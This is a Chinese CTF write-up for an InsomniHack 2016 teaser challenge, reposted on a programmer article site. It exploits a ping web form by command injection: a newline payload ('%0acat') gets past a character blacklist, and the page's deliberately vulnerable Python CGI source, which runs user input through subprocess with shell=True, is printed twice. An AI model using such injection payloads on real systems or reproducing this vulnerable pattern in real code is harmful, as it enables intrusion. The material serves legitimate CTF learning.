欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  web前端

InsomniHack 2016 CTF teaser – Bring the noise Crypto 200 WriteUp_html/css_WEB-ITnose

程序员文章站 2022-05-04 12:41:20
...
帮小伙伴解个题,想起博客很久没更新了,顺便写上来。

给了个网址,提示说按照正常思维去拿flag.......(瞬间吐槽2333333玩这个谁会自己按照正常思维啊...)

给出网页可以允许ping其他主机并显示结果。

这个阶段的话就相当于随便猜了,八九不离十是远程代码执行。然后开始常见注入测试,但是发现大部分都被过滤了。

还好换行符没被ban,unix中还能用作分隔符。

果然可以列出当前目录....然后就开始吐槽制作方的无脑.....(等下你就知道了)

然后发现这个页面同时支持GET/POST请求,写了个注入语句读取一下这个cgi的内容:

?dest=%0acat

Python

#!/usr/bin/env python import cgi, subprocess, os headers = ["mod_cassette_is_back/0.1","format-me-i-im-famous","dirbuster.will.not.help.you","solve_me_already"] print "X-Powered-By: %s" % headers[os.getpid()%4]print "Content-type: text/html"print print """ Can I haz Smart Cat ???

Smart Cat debugging interface

""" blacklist = " $;&|({`\t"results = ""form = cgi.FieldStorage()dest = form.getvalue("dest", "127.0.0.1")for badchar in blacklist:if badchar in dest:results = "Bad character %s in dest" % badcharbreak if "%n" in dest:results = "Segmentation fault" if not results:try:results = subprocess.check_output("ping -c 1 "+dest, shell=True)except:results = "Error running " + "ping -c 1 "+dest print """
Ping destination:
Ping results:
%s
InsomniHack 2016 CTF teaser – Bring the noise Crypto 200 WriteUp_html/css_WEB-ITnose""" % cgi.escape(results)
#!/usr/bin/env python import cgi, subprocess, os headers = ["mod_cassette_is_back/0.1","format-me-i-im-famous","dirbuster.will.not.help.you","solve_me_already"] print "X-Powered-By: %s" % headers[os.getpid()%4]print "Content-type: text/html"print print """ Can I haz Smart Cat ???

Smart Cat debugging interface

""" blacklist = " $;&|({`\t"results = ""form = cgi.FieldStorage()dest = form.getvalue("dest", "127.0.0.1")for badcharin blacklist:if badcharin dest:results = "Bad character %s in dest" % badcharbreak if "%n" in dest:results = "Segmentation fault" if not results:try:results = subprocess.check_output("ping -c 1 "+dest, shell=True)except:results = "Error running " + "ping -c 1 "+dest print """
Ping destination:
Ping results:
%s
InsomniHack 2016 CTF teaser – Bring the noise Crypto 200 WriteUp_html/css_WEB-ITnose""" % cgi.escape(results)

好吧原来是个python脚本....

然后发现了不能ls -R的原因,因为TAB和空格被过滤了....

不过又没人说不能用别的办法啊,于是想到某个forum里的大神提到的新方法: find<.>

制作商你满满的心机啊.......诅咒你....

然后复制粘贴,拿到flag文件,尼玛为毛是个猫.......233333333333还有这个flag是什么鬼啊